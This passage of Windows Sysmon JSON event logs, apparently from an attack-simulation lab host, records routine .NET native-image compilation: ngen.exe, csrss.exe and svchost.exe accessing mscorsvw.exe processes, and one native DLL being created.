\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:33.538","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00109C4E0B00}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7265,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:33.538\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00109C4E0B00}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:33.538","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00109C4E0B00}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7266,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:33.538\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00109C4E0B00}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:33.538","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00109C4E0B00}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7267,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:33.601\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224D-5F25-0000-00104CCA0C00}\r\nTargetProcessId: 2148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:33.601","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224D-5F25-0000-00104CCA0C00}","TargetProcessId":"2148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7268,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:33.601\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224D-5F25-0000-00104CCA0C00}\r\nTargetProcessId: 2148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:33.601","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224D-5F25-0000-00104CCA0C00}","TargetProcessId":"2148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7269,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:33.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224D-5F25-0000-00104CCA0C00}\r\nTargetProcessId: 2148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:33.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224D-5F25-0000-00104CCA0C00}","TargetProcessId":"2148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7270,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:33.898\r\nProcessGuid: {41C8662E-224D-5F25-0000-00104CCA0C00}\r\nProcessId: 2148\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\864-0\\Microsoft.VisualBasic.Compatibility.Data.dll\r\nCreationUtcTime: 2020-08-01 08:05:33.898","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:33.898","ProcessGuid":"{41C8662E-224D-5F25-0000-00104CCA0C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\864-0\\Microsoft.VisualBasic.Compatibility.Data.dll","CreationUtcTime":"2020-08-01 08:05:33.898","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7271,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:33.945\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00103A590B00}\r\nTargetProcessId: 4476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:33.945","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00103A590B00}","TargetProcessId":"4476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7272,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:33.945\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00103A590B00}\r\nTargetProcessId: 4476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:33.945","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00103A590B00}","TargetProcessId":"4476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7273,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:33.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00103A590B00}\r\nTargetProcessId: 4476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 